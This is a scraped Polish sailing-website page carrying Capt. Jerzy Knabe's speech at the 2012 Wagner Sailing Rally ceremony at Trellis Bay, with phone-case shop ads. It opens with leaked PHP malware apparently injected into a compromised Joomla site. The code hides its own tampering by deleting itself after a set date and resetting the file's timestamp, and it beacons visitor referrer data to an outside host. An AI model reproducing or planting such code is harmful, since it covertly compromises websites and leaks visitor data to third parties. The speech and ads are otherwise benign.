check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Jacht.pl - Rejsy Morskie, Czartery Jachtów, Szkolenia Żeglarskie, Sklep Żeglarski - Uroczystości Wagner Sailing Rally 2012 - przemówienie kpt. Jerzego Knabe

Czartery jachtów typu bareboat, czartery ze skiperem. Atrakcyjne upusty nawet do 20% , oferta last-minute i one-way sprawdź konkretny termin czarteru. Morze Śródziemne, Karaiby, Seszele, Tajlandia....

Polecamy !
  Oryginalne Etui 3D do telefonu
  bezpieczne zakupy na Allegro !
galerie przedmiotow na aukcje
Start Artykuły Aktualności Uroczystości Wagner Sailing Rally 2012 - przemówienie kpt. Jerzego Knabe

Przemówienie kpt. Jerzego Knabe, komandora Wagner Sailing Rally 2012 na otwarciu ceremonii odsłonięcia Tablicy Pamiątkowej Władysława Wagnera Bellamy Cay, 21-go stycznia 2012  (wygłoszone w języku angielskim) 

Logo Wagner Sailing Rally 2012Drodzy Przyjaciele!
Witam wszystkich w imieniu organizatorów i chcę w krótkich słowach powiedzieć, dlaczego zorganizowaliśmy to wydarzenie. Wagner był harcerzem i pierwszym Polakiem, który opłynął świat pod Żaglami. Jak sam to określił - uległ „pokusie horyzontu”.

Był bardzo dumny ze swojego narodu, który właśnie odzyskał niepodległość po 123 latach niewoli. Prezentowanie światu polskiej bandery - w wielu miejscach po raz pierwszy - uważał za swoje patriotyczne zadanie.

Podróż nie była łatwa, ale okrążenia świata dokonał. Podczas rejsu musiał przebudowywać lub budować w sumie trzy jachty. Wielokrotnie zmieniał załogi i wytrwale przez siedem lat dążył do celu. Niestety, wybuch 2-iej Wojny Światowej uniemożliwił mu powrót do Ojczyzny, który byłby triumfalny i z pewnością doceniony.

Po wojnie sytuacja się zmieniła. Pomimo zwycięstwa, Polska została pozostawiona przez swoich aliantów po złej stronie żelaznej Kurtyny. Wagner zdecydował nie wracać do Polski. W przeciwieństwie do swoich rodaków - miał przynajmniej możliwość wyboru. W rezultacie był w PRL-u uznany za wroga ustroju, przemilczany i nieomal całkowicie zapomniany.

Ożenił się z Angielką i spędził resztę swego życia jako emigrant. Dopłynął do zatoki Trellis wraz z Żoną na kolejnym swoim jachcie - jolu RUBICON. Po 45-ciu latach w Polsce nastąpiły zmiany ale stało się to już zbyt późno dla Wagnera. W ostatecznej podróży do Polski wróciły już tylko jego prochy.

Pamięć o nim i jego osiągnięciach również prawie całkowicie zamarła. Zdecydowaliśmy się ją ożywić poprzez ogłoszenie roku 2012 - Rokiem Wagnera.

kpt. Jerzego Knabe
foto: pierwszy z prawej kpt. Jerzy Knabe, komandor Wagner Sailing Rally 2012
 
Pierwsze wydarzenie Roku Wagnera odbywa się teraz, tutaj w Trellis Bay. Następne będzie w Polsce, dnia 8-go lipca - aby upamiętnić 80-ta rocznicę wyruszenia na wokółziemski krąg. Później, we wrześniu podkreślimy 100-ną rocznicę urodzin a także dwudziestą rocznicę jego śmierci.

Dziękuję wam wszystkim za przybycie i za to, że dzielicie z nami uczucia. Szczególnie zaś wyrażam swoją wdzięczność moim współorganizatorom, z którymi pracuję już od ponad roku. Są to polscy żeglarze i ich różne stowarzyszenia. Najważniejsze z nich to:

- Bractwo Wybrzeża czyli Hermandad de la Costa - Polonia reprezentowane przez kolegę Andrzeja Kacałę;
- Karaibska Republika Żeglarska, która jest reprezentowana przez Andrzeja Piotrowskiego;
- PYANA czyli Polski Związek żeglarski w Ameryce Północnej reprezentowany przez Krzysztofa Kamińskiego oraz
- Yacht Klub Polski reprezentowany przeze mnie osobiście.

Ich bandery właśnie dumnie powiewają pod salingiem polskiego Żaglowca szkolnego FRYDERYK CHOPIN.

Powstanie tego pomnika dla Władysława Wagnera daje nam wielką moralną satysfakcję. Mamy też szczerą nadzieję, Że nasza tablica przyczyni się do wzrostu liczby Polaków odwiedzających Brytyjskie Wyspy Dziewicze aby żeglować po tych samych akwenach i miejscach, gdzie Wagner wraz z rodziną spędzili lata i uważali je za swój dom.

Chcemy też wyrazić wdzięczność naszym gospodarzom tutaj na Wyspach za wszelką udzieloną nam pomoc dla uczczenia pamięci Wagnera. Dziękujemy wszystkim !


Na zakończenie, zamykając ceremonię kpt. Knabe wzniósł toast:

ZA TYCH CO NA MORZU I TYCH CO NA WIECZNEJ WACHCIE !

 

( tekst zamieszczony na naszej stronie dzięki uprzejmości organizatorów uroczystości Wagner Sailing Rally 2012 ).


 
Znajdź nas na FaceBooku

  Kup w naszym sklepie na Allegro ! Wyróżnij się wśród innych swoim oryginalnym etui 3D na telefon !

   Zobacz nasze wzory: Batman, Stitch - Sticz, Star Wars - Lord Darth Vader, Minionek, Minionki, Myszka Minnie Miki,
   Disney Prosiaczek, Konik Pony - Jednorożec, Starbucks.

panel allegro
    Posiadamy bogatą ofertę Etui / Case do modeli telefonów:
   Apple: Apple iPhone 4/4S, Apple iPhone 5/4S/SE. Huawei: Huawei Y5 II, Huawei Y6 II, Huawei P8 Lite, Huawei P9 Lite.
   Samsung: Galaxy J3, Samsung Galaxy J310, Samsung Galaxy J5 (2016), Samsung Galaxy Grand Prime G530, Samsung Galaxy A5, Samsung Galaxy A5/E5.
   LG: LG G2 Mini, LG Leon 4G LTE C50, LG K8, LG K10.